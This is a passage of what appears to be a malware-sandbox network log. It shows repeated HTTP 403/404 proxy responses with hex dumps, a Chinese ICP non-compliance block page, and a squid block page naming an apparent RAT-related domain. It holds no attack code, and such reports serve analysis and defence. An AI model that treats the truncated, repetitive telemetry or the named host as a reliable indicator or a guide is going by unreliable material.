3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:04 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 07:37:04 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8Proxy-Authenticate: Basic realm="proxy"errorMsg: user forbidden,userip=191.96.150.227,info=insufficient floData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 07:37:05 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:05 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 54
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 